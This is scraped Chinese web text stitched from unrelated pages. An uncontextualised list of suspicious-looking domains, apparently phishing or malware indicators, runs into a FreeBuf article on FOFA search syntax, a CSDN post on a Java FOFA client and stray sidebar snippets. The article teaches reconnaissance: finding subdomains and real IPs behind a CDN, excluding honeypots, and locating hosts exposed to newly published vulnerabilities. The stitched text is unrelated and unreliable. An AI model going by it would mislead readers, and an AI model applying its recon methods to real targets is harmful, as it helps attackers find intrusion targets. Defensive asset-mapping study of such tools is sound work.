dd.sdsl06.top

dd001.wolfing1235.cn

ding.qdjyswkj.com

ding.yincaitong.com.cn

dingd.wolfing1234.cn

dingding.fjeihg3.cn

dou.qdjyswkj.com

doushop.lianhuawangluo07.xyz

down.cstny.xyz

down.qianniu.icu

down.qianniu2023.cc

dsf01.whnmzw.cn

fapiaoi.com

fwiop.club

fyjughk.top

fyjughk.xyz

fz.mandongzuoxinxi.cn

ghfdt.sbs

hfmzkj.top

hjklnmwps04.hhzef.cn

huiyi.sxnjal.cn

huiyix.icu

hy.fjehh9.cn

ijytr.sbs

jetdh.sbs

jhges.sbs

jy.hecishangwu.xyz

jy.hehuashangwu01.xyz

jy.hehuashangwu04.xyz

jy.hehuashangwu20.xyz

jy.lianhuawangluo17.xyz

jy1.hehuashangwu11.xyz

jy15.lianhuawangluo03.xyz

jy15.lianhuawangluo09.xyz

ktedy.sbs

ktfgr.sbs

kyy.fdjh7889.top

lian.qianmouren.top

luthj.sbs

m.atjzw.sbs

m.ghfdt.sbs

m.ijytr.sbs

m.ktfgr.sbs

m.nefgs.sbs

m.pjuyt.sbs

m.vrheg.sbs

m.yrfgd.sbs

mail.ghfdt.sbs

mail.ktfgr.sbs

mail.nefgs.sbs

mail.pjuyt.sbs

mail.vrheg.sbs

nefgs.sbs

office.hehuashangwu07.xyz

office1.lianhuawangluo20.xyz

office2.hehuashangwu13.xyz

office2.hehuashangwu20.xyz

office2.lianhuawangluo02.xyz

office2.lianhuawangluo08.xyz

office22.lianhuawangluo15.xyz

p.fjehyy6.cn

p.fjeihg9.cn

p.njcsdaq.top

pdf.nykoy06.life

pdf.ogkkl.top

piaojufw.cyou

ppdf.nykoy01.top

pssabe.mboworld.com

pyxiaoyuan.com

qn.hflh2.cn

qwertps01.whroz.cn

rar2.hehuashangwu16.xyz

sa.asog510.com

sdf.kemanxing.top

sg.pdfqo05.top

sg.yysk982.com

shanghu.hehuashangwu12.xyz

smtp.atjzw.sbs

smtp.ghfdt.sbs

smtp.ijytr.sbs

smtp.ktfgr.sbs

smtp.nefgs.sbs

smtp.pjuyt.sbs

smtp.vrheg.sbs

smtp.yrfgd.sbs

sogou1.hehuashangwu10.xyz

sogou2.lianhuawangluo04.xyz

sogou2.lianhuawangluo10.xyz

sougou22.lianhuawangluo24.xyz

sougou22.lianhuawangluo25.xyz

sss.fhgges.cn

telegramde.sbs

telegramvesl.org

telegrrram.com

txhy.qfmailw.com

tyujlih.icu

urbgv.sbs

vrheg.sbs

w.fegee8.cn

w.iejhfh5.cn

wang.hfqc3.cn

wang.iowxk1456.top

wang.mboworld.com

wang.yyghzmd.cn

wangp.winaaa.top

webdisk.atjzw.sbs

webdisk.ghfdt.sbs

webdisk.ijytr.sbs

webdisk.ktfgr.sbs

webdisk.nefgs.sbs

webdisk.pjuyt.sbs

webdisk.vrheg.sbs

webdisk.yrfgd.sbs

webmail.atjzw.sbs

webmail.ijytr.sbs

webmail.nefgs.sbs

webmail.pjuyt.sbs

webmail.vrheg.sbs

webmail.yrfgd.sbs

wf1.sdsl02.top

win.tzhzkj.com

winar.nykoy01.top

winrar.nykoy06.life

wkl.nykoy01.top

wp.fhufe9.cn

wp.herdc.com

wp.hflh2.cn

wp.hfmzwl.top

wp.hfyx3.cn

wp.pdfqo05.top

wp.wsp51si.top

wp.ycmzwy.cn

wppp1.hfmzwlkj.top

wps.nykoy06.life

wps.qdjyswkj.com

wps2.hehuashangwu05.xyz

wpss.nykoy01.top

wwp.sagh5293.top

wwps.tzhzkj.com

www.atjzw.sbs

www.fwiop.club

www.ghfdt.sbs

www.hehuashangwu02.xyz

www.hehuashangwu04.xyz

www.hehuashangwu05.xyz

www.hehuashangwu06.xyz

www.hehuashangwu07.xyz

www.hehuashangwu08.xyz

www.hehuashangwu09.xyz

www.hehuashangwu14.xyz

www.hehuashangwu19.xyz

www.hehuashangwu20.xyz

www.ijytr.sbs

www.ktfgr.sbs

www.lianhuawangluo13.xyz

www.lianhuawangluo14.xyz

www.lianhuawangluo20.xyz

www.lianhuawangluo21.xyz

www.lianhuawangluo22.xyz

www.lianhuawangluo24.xyz

www.lianhuawangluo28.xyz

www.lianhuawangluo29.xyz

www.lianhuawangluo38.xyz

www.lianhuawangluo39.xyz

www.lianhuawangluo39.xyz:22

www.lianhuawangluo39.xyz:43080

www.luthj.sbs

www.piaojufw.top

www.pjuyt.sbs

www.swqe.sbs

www.telegramde.sbs

www.telegramvesl.org

www.telegrrram.com

www.vrheg.sbs

www.yfapiao.cyou

www.yfapiao.top

www.yrfgd.sbs

www.yunfpzx.com

xjtdf.sbs

xl.hflh2.cn

xun.hfyx1.cn

xunl.hfqc3.cn

xunlei11.hehuashangwu15.xyz

xunlei11.lianhuawangluo01.xyz

xunlei11.lianhuawangluo12.xyz

xunlei11.lianhuawangluo23.xyz

xunlei11.lianhuawangluo25.xyz

xw.wsopkf.top

xwbb.mmwu710.com

yrfgd.sbs

yunfpzx.com

yunvfapiao.com

yxc16.chenqingwen.top

yyds.hnxbkjyxgs.com

yyts08.hhzef.cn

zip1.hehuashangwu18.xyz

zip2.lianhuawangluo05.xyz

zip2.lianhuawangluo11.xyz

zuo.zhangsilei.top

zxcvbbnnca03.hhzef.cn

zxcvvbrar02.whroz.cn▌参考文章: https://mp.weixin.qq.com/s/ae1iOSrUOrGBhERyjqZJIQhttps://mp.weixin.qq.com/s/jy_iVqXB3QLgsaxApVXc5Ahttps://mp.weixin.qq.com/s/WmLekqCN3sOy3_JQlMvyVg发布于 2023-11-09 10:43・IP 属地北京资产网络空间测绘fofa​赞同 1​​添加评论​分享​喜欢​收藏​申请转载​文章被以下专栏收录网络空

fofa常用语法+新功能-网络空间测绘 - FreeBuf网络安全行业门户

fofa常用语法+新功能-网络空间测绘 - FreeBuf网络安全行业门户

主站 分类

漏洞

工具

极客

Web安全

系统安全

网络安全

无线安全

设备/客户端安全

数据安全

安全管理

企业安全

工控安全

特色

头条

人物志

活动

视频

观点

招聘

报告

资讯

区块链安全

标准与合规

容器安全

公开课

报告 专辑 ···公开课···商城···

用户服务

··· 行业服务

政 府

CNCERT

CNNVD

会员体系(甲方)

会员体系(厂商)

产品名录

企业空间

知识大陆 搜索 创作中心 登录注册 官方公众号企业安全新浪微博 FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。 FreeBuf+小程序把安全装进口袋 fofa常用语法+新功能-网络空间测绘

关注

工具 fofa常用语法+新功能-网络空间测绘

2021-04-01 22:54:13

前言:首先可以利用FOFA进行漏洞挖掘和安全研究。对于白帽子挖掘漏洞来讲,信息收集是第一步,也是很重要的一步。比如挖SRC的时候要进行子域名收集,查找真实IP等。如果寻找某电商的子域名,可以根据其证书,header信息,备案号,页面引用的特定文件等找到相关其子域名。对于一些有cdn的,也可以绕过cdn找到真实IP。FOFA搜索语法主要分为检索字段以及运算符,所有的查询语句都是由这两种元素组成的。目前支持的检索字段包括:domain,host,ip,title,server,header,body,port,cert,country,city,os,appserver,middleware,language,tags,user_tag等等,支持的逻辑运算符包括:= ,==,!= ,&&,||常用命令:1.title搜索包含“标题”的IP title=“标题”domain搜索所有子域名host搜索host内所有带有qq.com的域名ip搜索ip相关信息:ip=“58.63.236.248”支持ip段搜索 ip=”111.1.1.1/16″ip=”111.1.1.1/24″bodyserver例:Apache出来了一个高危漏洞,我们需要去统计全球的Apache server=”Apache”新功能:网络空间测绘蜜罐:蜜罐是一种软件应用系统,用来称当入侵诱饵,引诱黑客前来攻击。攻击者入侵后,通过监测与分析,就可以知道他是如何入侵的,随时了解针对组织服务器发动的最新的攻击和漏洞。还可以通过窃听黑客之间的联系,收集黑客所用的种种工具,并且掌握他们的社交网络。 设置蜜罐并不复杂,只要在外部因特网上有一台计算机运行没有打上补丁的微软Windows或者Red Hat Linux即行,然后在计算机和因特网连接之间安置一套网络监控系统,以便悄悄记录下进出计算机的所有流量。然后只要坐下来,等待攻击者自投罗网。在hw快要开始的时候,fofa最近更新在梳理资产时可以排除蜜罐数据。方法1:在你想要的输入东西后面+is_honeypot="false"   即可对当前结果过滤;is_honeypot="false"例使用方法2:在梳理资产的时候,点击那个蜜罐开关,便可以过滤蜜罐。可以联合其他语法使用,如title、header、domain,host,ip等等进行联合查询。大大便利了白帽子们,这功能很不错,哈哈。FOFA还可以在实战中,关键步骤是定位资产归属,找到入口。使用方法:通过关键字直接搜索cert=“ xxxx”FOFA还增加了网站的真伪查证,极大地方便了用户辨别;使用方法:直接使用icp=""查询语法;1.先查备案号2.使用fofa判断icp="京ICP证xxxx号"常见漏洞挖掘思路前言:在某些平台上,爆出了新的漏洞之后,你就可以使用fofa,搜索一波,查找到符合条件的。然后就可以提交一波了,还可以搜索历史漏洞。例:Apache Flink未授权访问+远程代码命令执行app="Adobe-ColdFusion"真实ip探测--fofa小技巧1.先使用title搜一下,ip与目标网站有关的。2.看到结果很多,我们就拿第一个来试试把。3.然后查找证书0E 3C C1 49 94 B3 E1 74 A6 34 54 D9 90 64 66 D74.然后转换为10进制   189246500872315240515809323883978032235.使用fofa,搜证书就行/ 本文作者:,

转载请注明来自FreeBuf.COM # web安全 # 无线安全 # 系统安全 # 数据安全 # 内网渗透

被以下专辑收录,发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

展开更多

相关推荐

关 注 0 文章数 0 关注者 本站由阿里云 提供计算与安全服务 用户服务 有奖投稿 提交漏洞 参与众测 商城 企业服务 安全咨询 产业全景图 企业SRC 安全众测 合作信息 斗象官网 广告投放 联系我们 友情链接 关于我们 关于我们 加入我们 微信公众号 新浪微博 战略伙伴 FreeBuf+小程序 扫码把安全装进口袋 斗象科技 FreeBuf 漏洞盒子 斗象智能安全平台 免责条款 协议条款

Copyright © 2020 WWW.FREEBUF.COM All Rights Reserved

   沪ICP备13033796号

|

沪公安网备

FOFA Java程序集成fofa_fofa client-CSDN博客

>

FOFA Java程序集成fofa_fofa client-CSDN博客

FOFA Java程序集成fofa

最新推荐文章于 2023-04-24 11:20:46 发布

Song_Estelle

最新推荐文章于 2023-04-24 11:20:46 发布

阅读量362

收藏

点赞数

分类专栏:

Java

文章标签:

java

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文链接:https://blog.csdn.net/weixin_43484014/article/details/120015943

版权

Java

专栏收录该内容

18 篇文章

0 订阅

订阅专栏

Java程序集成fofa

fofa官网:https://fofa.so

1. Maven 添加依赖

com.r4v3zn.fofa

fofa-core

1.0.4.RELEASE

2. 使用方法

key 在个人中心的个人资料中,地址:https://fofa.so/userInfo

public static void main(String[] args) throws Exception {

// 邮箱账号

String email = "XXXXXXX@qq.com";

//

String key = "4aXXXXXXXXXXXXXXXX6927b76f83963";

String q = "ip=\"8.8.8.8\"";

String fields = "host,ip,port,country_name,as_organization,latitude,longitude";

FofaClient client = new FofaClient(email, key);

System.out.println(JSON.toJSONString(client.getUser()));

System.out.println(JSON.toJSONString(client.getData(q, 1, 10, fields)));

}

其中的查询参数q可以以多种形式查询,fofa首页有多种查询语法

默认不加fields参数的话,返回的只有对应的IP地址

fields参数可携带多个参数,对应参数值查询之后可返回

3. 获取的结果

优惠劵

Song_Estelle

关注

关注

0

点赞

0

收藏

觉得还不错?

一键收藏

知道了

1

评论

FOFA Java程序集成fofa

Java程序集成fofafofa官网:https://fofa.so1. Maven 添加依赖<!--fofa--><dependency> <groupId>com.r4v3zn.fofa</groupId> <artifactId>fofa-core</artifactId> <version>1.0.4.RELEASE</version></dependency>

复制链接

扫一扫

专栏目录

fofa2Xray:用户fofa API获取主机并进行X射线扫描以进行WebScan

04-16

fofa2Xray

一个工具,可以结合和的自动批量多线程扫描。

也可以使用Xray扫描IP /域名列表。

适用于Windows,Linux和macOS的golang编码。

文献资料

介绍

使用fofa api获取目标域列表,然后通过xray进行网络扫描。

演示版

文件模式快速入门

1.在f2Xconfig.yaml中配置Xray可执行文件地址和线程数

2.使用“ -t文件”指定为文件列表扫描模式(默认为fofa模式),-f指定IP列表文件

./fofa2Xray -t file -f ipList.txt

3.也许有点奇怪,但是为了更好的可扩展性

Fofa模式快速入门

将Xray移至fofa2xray所在的目录

Vi f2Xconfig.yaml

fofa :

email : {fofa账户}

key : {fofaKey}

# 固定查询语句

fixedQ

twnanda.github.io:台南佛法页

02-09

twnanda.github.io:台南佛法页

1 条评论

您还未登录,请先

登录

后发表或查看评论

fofa客户端下载

weixin_51387754的博客

11-11

4101

fofa windows客户端此文仅以认识为主,不参与内斗,暗斗,若有侵权,请联系删除

fofa windows客户端下载

链接:https://pan.baidu.com/s/1ZJCIeKIVkqkCwQR7HoBbiw

提取码:2222

–来自百度网盘超级会员V3的分享

允许对设备进行更改

来到登录页面

Apache

app=“APACHE-Web-Server”

SSH

protocol=“ssh” || banner=“ssh”

OpenSSL

app=“OpenSSL”

Wordp

Fofa 下载与使用 网络空间搜索引擎

weixin_47853811的博客

12-19

6660

Fofa 网络空间搜索引擎

官方网址:https://fofa.so/

下载地址:https://fofa.so/about_client

API:https://fofa.so/static_pages/api_help

以焦作大学官方网址为例:domain="jzu.edu.cn"

可以看到对应的信息

FOFA(一): FOFA入门

热门推荐

浅弋、璃鱼的博客

01-03

1万+

FOFA是部署在互联网上的网络设备资产信息搜索引擎。旨在尽可能多的对全球IT设备资产进行信息收集, 进而开展资产影响分析、漏洞影响分析, 为相关流行态势感知分析提供依据;

fofa工具下载安装

最新发布

把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....

04-24

886

如果弹出配置出错,把最后一个maxsize次数改成10000 就可以启动成功。需要自己下载的根据自己PC的Java环境选择合适的安装包下载解压。1、首先在配置文件里填写fofa的账号和api key。然后我们就可以通过工具去使用fofa网络空间搜索引擎了。fofa的api在个人资料中查看。

漫谈 WebLogic-CVE-2020-2551

数据库生态圈(RDB & NoSQL & Bigdata)——专注于关系库优化(Oracle&Mysql&PG&SQL Server )

01-14

1178

本文源自:https://paper.seebug.org/1149/#jdk

作者:r4v3zn@白帽汇安全研究院本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送!投稿邮箱:paper@seebug.org

背景

2020 年 1月14日,Oracle 发布了大量安全补丁,修复了 43 个严重漏洞,CVSS 评分均在在9.1以上。 其中 CVE-2020-2551 漏洞,互联网中公布了几篇针对该漏洞的分析文章以及POC,但公布的 POC 有部分不足之处,导致漏洞检测效..

FofaViewer佛法批量搜索爬虫工具

02-28

FofaViewer佛法批量搜索爬虫工具

佛法行情「Dharma Quotes」-crx插件

03-12

每当您打开一个新标签时,请阅读法律报价。 来自所有佛教传统的老师的名言。 1.0.0版具有全新的大小调整逻辑,可提供完全响应的体验,还有超过1700个引号。0.5.0版具有更好的逻辑来调整文本大小和近900个引号。...

fofa查询接口.exe

08-16

fofa查询接口,需要apikey,默认查询10000条, host,ip,title字段可以多选,fofa自身还有其他很多字段,没有限制,不过我一般获取这三个字段

fofa_viewer:一个简单易用的fofa客户端,使用javafx编写,便于跨平台使用

04-16

Fofa_Viewer :link:

简介

Fofa_Viewer 一个简单易用的fofa客户端由WgpSec狼组安全团队 师傅主要编写 ,程序使用使用javafx编写,便于跨平台使用

使用

下载最新版本包,修改config.properties 即可开始使用

MAC 用户可以参考来配置快速启动

查询语法可参考

若下载速度太慢可以使用

(推荐)

(镜像)

:sparkles: 功能

多标签式查询结果展示

丰富的右键菜单

支持查询结果导出

支持手动修改查询最大条数,方便非高级会员使用(修改config.properties中的maxSize即可)

支持证书转换 将证书序列填写入启动页框内可转换,再使用 cert="计算出来的值" 语法进行查询

:rocket: 二次开发

git clone https://github.com/wgpsec/fofa_viewer.git

本项目使用 maven-assembly-plugi

fofa_view:FOFA Pro视图是一个FOFA Pro资产展示浏览器插件,目前兼容Chrome,Firefox,Opera

01-28

FOFA Pro视图

FOFA Pro视图是一个FOFA Pro资产展示浏览器插件,目前兼容 , , 。

Fofa Pro View插件会告诉您网站的托管位置(国家/地区,城市),谁拥有IP,还有哪些其他服务/端口处于打开状态。

适用于Chrome的Fofa Pro View插件会自动检查Fofa Pro是否具有当前网站的任何信息。 该网站是否还运行FTP,DNS,SSH或某些异常服务? 使用此插件,您可以查看Fofa Pro在给定的网站/域上收集的所有信息。

项目地址: :

安装

Chrome

手动安装

下载版本: :

解压插件压缩包,打开chrome:// extensions /并打开开发者模式,点击加载已解压的扩展程序选择已经解压的插件目录进行加载。

商城安装

火狐

手动安装

下载版本: :

解压插件压缩包,打开有关:debugging#/ runtime / this-firefox点击临时载入附加组件…选择下载的插件压缩包。

商城安装

更新日志

2020-07-18

优化:对接新版FOFA Pro

优化:协议,端口图标

新增:IP所属组织,ASN

新增:IP

纯闻法师:佛法与企业文化.pdf

10-22

纯闻法师:佛法与企业文化.pdf

relayer-starter-kit:在佛法上启动您自己的中继器

04-27

此回购包含启动Dharma Relayer的启动程序代码。 后端 前端 部署方式 创建一个新的Heroku应用程序: 设置您要部署到的网络: ... 成为佛法中继器的批准程序是什么? 没有启动Dharma Relayer的批准

Java将多个文件打包成ZIP并下载

weixin_43484014的博客

10-29

7375

Java将多个文件打包成ZIP并下载

需求是多个文件需要同时打包成zip压缩文件并下载到本地,首先我需要的是知道下载文件的路径。我有一个专门的sys_file_info表,表中有对应的文件路径。业务表中的文件地址放的就是文件表的id值。下面是代码:

1.Mapper层